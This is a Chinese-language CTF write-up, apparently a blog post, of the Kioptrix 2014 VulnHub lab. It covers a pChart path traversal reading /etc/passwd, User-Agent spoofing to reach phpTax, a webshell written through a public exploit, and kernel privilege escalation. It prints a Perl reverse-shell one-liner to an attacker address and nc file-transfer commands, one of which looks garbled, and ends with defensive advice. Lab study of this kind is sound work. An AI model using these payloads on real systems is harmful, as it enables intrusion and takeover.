以下演示在测试环境进行-遵纪守法
靶场下载地址Kioptrix: 2014 (#5) ~ VulnHub
看网上都说这个靶场,在下载之后运行前,需要将靶场默认网卡卸载,之后再重新添加网卡,不然获取不到IP,本着听人劝,吃饱饭原则,安装前辈经验操作
#信息收集
查看自己攻击机网段111.0,使用nmap 192.168.111.0/24 进行网络主机发现
发现存活主机111.132
开启有22、80、8080对80和8080端口尝试浏览器访问
8080端口直接被配置为禁止访问
80端口挂载的是web服务,这题听说是ctf题,所以直接右键,查看源码
发现源码里面指向了一个路径
尝试访问,发现是一个管理系统,具体啥没见过,但是发现是一个生成模板的工具
并且用户输入的标题可以插入到模板php内
但是经过尝试发现无法直接得到php模板访问路径,这条路线失败
但是发现指明的版本信息和url中数字是匹配的
所以,猜测pchart是一个成熟商用系统,进行漏洞搜索
搜索发现,存在路径穿越和XSS,XSS目前对于我们拿到系统权限暂时用处不大,因为就只有我们自己是用户,用来反弹cookie也不现实,再者系统压根就没有登录页面
尝试看一下目录穿越具体利用路径
所以尝试的路径就是直接替换examples路径之后的内容
ip/pChart2.1.3/examples/index.php?Action=View&Script=../../../../../../../../etc/passwd
有mysql账户,但是目标主机没有对外开放3306端口,所以即使翻到配置文件也暂时无法利用
8080端口默认应该是Apache Tomcat web server
但是直接访问是禁止访问的,所以目录扫描无论怎么扫描都不会发现有价值利用信息,因为姿势不对,访问都是被禁止的
尝试读取一下apache配置文件,使用apache默认配置文件位置并没有读取到
尝试读取配置文件查看系统信息,都失败
最后发现,好心的靶场老哥再passwd文件开头添加了两句注释
大意了 大意了
经网上查询
原来是这个位置
在配置的最后有一句话
这句话主要是配置允许哪种浏览器来访问,可以在有恶意爬虫攻击的时候,禁用掉一些恶意请求
也就是我们模拟这种浏览器,在请求头里面,就能访问
使用hackbar插件替换一下
只返回了一个页面链接,点了一下,没权限,还是同样操作,需要替换请求头
最后就得到了一个这个,全都显示失败了
没办法,查看一下网页源码看看吧
在网页源码里面发现了,这个phptax 貌似是一个成熟商用系统
于是尝试进行漏洞搜索
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
好家伙,都是致命漏洞
随便尝试一个
按照要求进行拼接
并且替换请求头 
这不巧了吗,成功,直接写一句话木马
这句应该是将命令写到某个文件里
然后尝试使用蚁剑连接
连接成功,蚁剑里面需要点一下第二项 HTTP,陪一下agent头
登录之后发现需要提权
尝试几种提权方式无果,尝试利用系统漏洞进行提权
搜索系统版本信息后,发现有两个提权漏洞
下载第一个,直接使用蚁剑上传,gcc编译,执行提权,但是失败,运行成功,但是没有提权成功
看来蚁剑连接的shell和提权脚本八字不合
没办法,想是不是能直接通过命令反弹shell,经过几轮NC尝试反弹都没有成功
之后使用Perl脚本反弹时成功的
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.111.128:8888");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
长长脚本
反弹成功,因为之前提权脚本已经传上去了
如果直接使用命令反弹的shell
可以使用nc传一下
攻击机:nc -lvp 1337 < 28718.c
目标靶机shell下:nc -nv 192.168.111.128 8888 > /bin/sh
传完之后shell会掉线,之后重连一次,gcc直接编译
之后运行、
看来提权脚本作者在制作脚本的时候还是蛮兴奋的
最后:
对于存在已知公开漏洞的系统,能升级及时升级,不能升级进行替换或者进行分层防御,及时向上报告使用陈年旧系统给组织带来的危害
对重要页面使用身份认证方式配合多因素身份认证进行保护,即使是不重要内容,被进行漏洞利用,也会危及核心资产
删除代码中无用注释,注释往往能够泄露开发者开发思维,为寻找逻辑漏洞雪中送碳,锦上添花
定期对系统和应用软件进行漏洞扫描,并将扫描结果闭环
1223
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
